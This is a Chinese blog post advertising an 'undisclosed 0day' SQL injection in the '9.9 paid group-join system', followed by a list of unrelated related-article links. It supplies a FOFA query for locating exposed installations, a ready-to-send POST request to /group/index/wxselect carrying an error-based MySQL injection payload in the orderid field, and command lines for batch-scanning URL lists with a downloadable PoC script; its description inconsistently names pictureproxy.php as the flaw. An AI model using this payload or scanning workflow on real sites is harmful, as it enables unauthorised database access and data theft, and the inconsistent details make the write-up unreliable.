首页 > 数据库 >【未公开0day】9.9付费进群系统 wxselect SQL注入漏洞【附poc下载】

【未公开0day】9.9付费进群系统 wxselect SQL注入漏洞【附poc下载】

时间:2024-10-14 17:17:47浏览次数:9  
标签:url 检测 0day 漏洞 付费 wxselect SQL 社群

免责声明:本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,若利用本文提供的内容或工具造成任何直接或间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。

fofa语法

body="template/layuiadmin/xinadmin"

一、漏洞简述

9.9付费进群系统是一种便捷的社群管理工具,旨在通过设置低门槛的付费机制来吸引用户加入社群。该系统允许管理员创建付费群组,用户只需支付少量费用即可获得加入权限。这种方式不仅能有效筛选目标用户,还能为社群带来稳定的收入,同时增强成员的参与感和归属感。系统通常还提供自动化管理功能,简化了群组的运营流程,适用于各类社群和行业。其接口pictureproxy.php存在SQL漏洞,攻击者可通过该漏洞获取数据库敏感文件信息。

二、漏洞检测poc

POST /group/index/wxselect HTTP/2
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

orderid=') AND GTID_SUBSET(CONCAT((MID((IFNULL(CAST(md5(123456) AS NCHAR),0x7e)),1,190))),1)--+

三、漏洞检测脚本

安全测试人员可通过该脚本进行探测自身服务是否存在此漏洞:

POC下载:POC下载

批量检测:

python99system_wxselect_SQLInject.py -f url.txt

图片

单个url检测漏洞:

python 99system_wxselect_SQLInject.py -u url

图片

四、修复

官方已更新补丁,请升级至最新版本。

标签:url,检测,0day,漏洞,付费,wxselect,SQL,社群
From: https://blog.csdn.net/zixunchu001/article/details/142923753

相关文章

  • 一文为你解读MySQL8.0 Instant DDL源码实现
    一、背景介绍数据库中每一行数据都被持久化存储在磁盘中。当我们对表进行ADD/DROPCOLUMN操作时,磁盘中的数据也会相应地被修改,所需时间与对应表的大小成正比。因此,对大表进行ADD/DROPCOLUMN操作时,花费的时间可能长达数小时或数天,这给用户的业务带来了诸多不便。MySQL5.5版本......
  • python3.6 解析svg保存到mysql
     1importjson2fromcollectionsimportCounter3fromjsonimportJSONDecodeError45importmysql6importrequests7fromlxmlimportetree89#定义远程SVG文件的URL10file=r'D:\tmp_files\jmx\0919_3568.txt'11dat......
  • MySQL Workbench的安装
    MySQLWorkbench是一款由MySQL官方开发和提供的统一可视化工具,专为数据库管理员、开发者和数据架构师设计。它提供了数据建模、SQL开发和数据库管理的全面功能,支持Windows、Linux和macOS操作系统。MySQLWorkbench是一个强大的工具,它通过图形界面简化了许多复杂的数据......
  • 基于Java+Jsp+Ssm+Mysql实现的在线乡村风景美食景点旅游平台功能设计与实现一
    一、前言介绍:1.1项目摘要乡村风景美食旅游平台的课题背景主要基于我国旅游产业的现状与发展需求。当前,我国旅游产业虽然发展迅速,但仍然存在基础薄弱、管理手段滞后、信息化程度低等问题。旅游行政管理部门的管理方式相对落后,缺乏有效的信息化管理手段,信息沟通渠道不畅,这......
  • 基于Java+Jsp+Ssm+Mysql实现的在线乡村风景美食景点旅游平台功能设计与实现二
    一、前言介绍:1.1项目摘要乡村风景美食旅游平台的课题背景主要基于我国旅游产业的现状与发展需求。当前,我国旅游产业虽然发展迅速,但仍然存在基础薄弱、管理手段滞后、信息化程度低等问题。旅游行政管理部门的管理方式相对落后,缺乏有效的信息化管理手段,信息沟通渠道不畅,这......
  • mysql8: 主从复制从库报错时,找到主库上的sql
    一,从库机器上:从库mysql日志中的报错信息给出了日志文件名和end_log_pos2024-10-12T09:41:23.761203Z414[ERROR][MY-013146][Repl]ReplicaSQLforchannel'':Worker1failedexecutingtransaction'ANONYMOUS'atsourcelogmysql-master-bin.000002,end_log_pos......
  • SQL Server查询当日数据 昨日数据 本月数据
     今天数据:select*from表名whereDateDiff(dd,datetime类型字段,getdate())=0昨天数据:select*from表名whereDateDiff(dd,datetime类型字段,getdate())=17天内数据:select*from表名whereDateDiff(dd,datetime类型字段,getdate())<=730天内数据:select*from表名......
  • 对SQL Server中敏感数据进行加密解密的操作方法
    近几年有不少关于个人数据泄露的新闻(个人数据通常包含如姓名、地址、身份证号码、财务信息等),给事发公司和被泄露人都带来了不小的影响。许多国家和地区都出台了个人数据保护的法律法规,如欧盟的通用数据保护条例(GDPR)。不管是出于遵守法规、数据保护还是隐私保护等,对个人数据加密有......
  • MySQL 设计数据表
    一个数据表主要包含信息有:表名、主键、字段、数据类型、索引,本节主要介绍表的命名规范、字段命名、字段的数据类型选择。新建的表都是新建在“item_name”数据库中的,新建“item_name”数据库命令如下:CREATEDATABASEitem_name;新建数据库之后选择数据库:USE......
  • MySQL 的 JDBC 编程
    MySQL的JDBC编程使用java代码操作数据库jdbc统一了各种数据库的api准备阶段首先要准备编辑语言的安装:javajdk1.8数据库数据库驱动包:在中央仓库下载搜索MySQL第一个就是MySQLConnector/j下载完成后在IDEA中导入这个包打开IDEA新建一个java项目新建......